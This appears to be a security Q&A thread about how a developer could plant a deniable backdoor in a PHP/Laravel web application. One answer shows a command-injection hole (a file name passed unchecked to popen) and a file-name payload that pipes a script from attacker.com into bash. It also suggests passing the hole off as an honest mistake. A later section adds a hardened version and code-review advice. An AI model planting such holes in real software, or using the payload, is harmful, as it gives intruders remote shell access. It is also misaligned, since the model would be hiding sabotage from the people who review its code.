-2

I'm pretty curious how someone could leave a backdoor in a Laravel application? In my opinion there isn't a way, because the entry point of the requests is a route file, and you have to write code for the route in order for there to be something to execute. Your team member will be able to track it down, and will tell you "Hey! What's that?".

Every request has an entry point, and that entry point is a route in this case, which will call a specific controller and its method. And there you have some logic that can be executed.

As we know, you have to follow some pretty clean rules for writing SQL queries, and CSRF protection is already there. The common security vulnerabilities are well treated in the Laravel framework.

So what are the possible ways to leave a backdoor in a web application?

Anders
Comrade
  • 4
    A backdoor can be disguised as an unintentional vulnerability. If you say framework X can't have a backdoor you're also saying the application can't possibly have any major vulnerabilities - which appears unlikely. – Arminius Apr 22 '17 at 18:28
  • Hope I didn't miss the action. Anyway, my point was how you can leave a backdoor or some vulnerability that is sophisticated, meaning it is not easy to find. Frameworks try to take care of common loopholes, but the ones an experienced programmer can leave will be different. – Comrade Apr 23 '17 at 10:33

2 Answers

2

So what are the possible ways to leave a backdoor in a web application?

Say, you have a URL to upload a document. Files are uploaded to this fairly innocuous URL:

https://example.com/upload.php?filename=blah.doc
# alternatively, filename could be in the request body, which makes no difference to the attack vector

You have code that converts the uploaded document to HTML for preview in the browser:

$filename = $_GET["filename"];  // attacker-controlled, used without validation
...
popen("doc2html " . $filename, "r");  // the whole string is handed to the shell
# alternatively, using Symfony's Process class makes no difference to vulnerability

Seems innocuous, but unfortunately this code gives an attacker full shell access to your machine. The attacker can just upload a file named something like foo.doc || curl http://attacker.com/script.sh | bash, in other words uploading to https://example.com/upload.php?filename=foo.doc%20%7C%7C%20curl%20http%3A%2F%2Fattacker.com%2Fscript.sh%20%7C%20bash. And when popen()-ed, this filename will cause popen to download and execute script.sh.

If the bug is found, you can simply say "oops, that was an honest mistake"; you can plausibly deny that you intentionally inserted the backdoor.

Lie Ryan
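A hardened form of the preview handler from the answer above, as an added example that is not part of the original answer: it allowlists the file name and runs doc2html without a shell. UPLOAD_DIR and the function names are assumptions, and the array form of proc_open() needs PHP 7.4 or later.

```php
<?php
declare(strict_types=1);

// Assumed upload directory (hypothetical, not from the original answer).
const UPLOAD_DIR = '/var/app/uploads';

// Allowlist check: a bare name of letters, digits, '.', '_' or '-' ending in
// .doc. Spaces, slashes and shell metacharacters (| ; & $ `) never pass.
function safeUploadPath(string $name): ?string
{
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.doc\z/', $name)) {
        return null;
    }
    return UPLOAD_DIR . '/' . $name;
}

// Run doc2html without a shell: with an array command, proc_open() executes
// the program directly, so the path is one argument and is never parsed
// as shell syntax. Returns the HTML, or null on failure.
function convertToHtml(string $path): ?string
{
    $spec = [
        1 => ['pipe', 'w'],              // capture stdout
        2 => ['file', '/dev/null', 'a'], // discard stderr so it cannot block
    ];
    $proc = proc_open(['doc2html', $path], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $html = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return proc_close($proc) === 0 && $html !== false ? $html : null;
}

// Constructed sample inputs: an ordinary name and the file name quoted in
// the answer. Only an accepted path would be passed on to convertToHtml().
$samples = ['blah.doc', 'foo.doc || curl http://attacker.com/script.sh | bash'];
foreach ($samples as $name) {
    $path = safeUploadPath($name);
    echo json_encode($name), ' => ',
        $path === null ? 'rejected' : "accepted as $path", PHP_EOL;
}
```

In code review, the thing to look for is the pattern this replaces: request data concatenated into a string that reaches popen(), exec(), system() or a similar shell-invoking call.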
-3

You don't leave a backdoor. Backdoors are left unintentionally. For example, when you connect to your remote database without a secure channel (SSL maybe), so that the connection is not encrypted, you are leaving a vulnerability. Say someone taps into your communication, or maybe just somehow gets your URL (connection string), and alters/deletes your database, which is vulnerable, and you lose all your precious data; then it will be exploitation of your vulnerability, or simply using a backdoor.

  • 3
    A backdoor is not "left unintentionally", it's built on purpose. – Arminius Apr 22 '17 at 22:41
  • Both the answer and @Arminius's reply are not completely correct. A backdoor can be intentionally placed in a system by a malicious actor, or it can be an unintended consequence of a bug. – 0xSheepdog Apr 22 '17 at 23:24
  • 4
    @0xSheepdog IMO, calling an unintentional bug a backdoor is misleading. – Arminius Apr 22 '17 at 23:34
  • 1
    It's all a matter of semantics. "Backdoor" isn't exactly a technical term with a consistently applied and documented definition. That is why these sorts of answers are not usually well received. – 0xSheepdog Apr 23 '17 at 03:09
  • Guys, that's not the point of it. The point is how can you leave an intentional backdoor? What are your experiences? – Comrade Apr 23 '17 at 10:35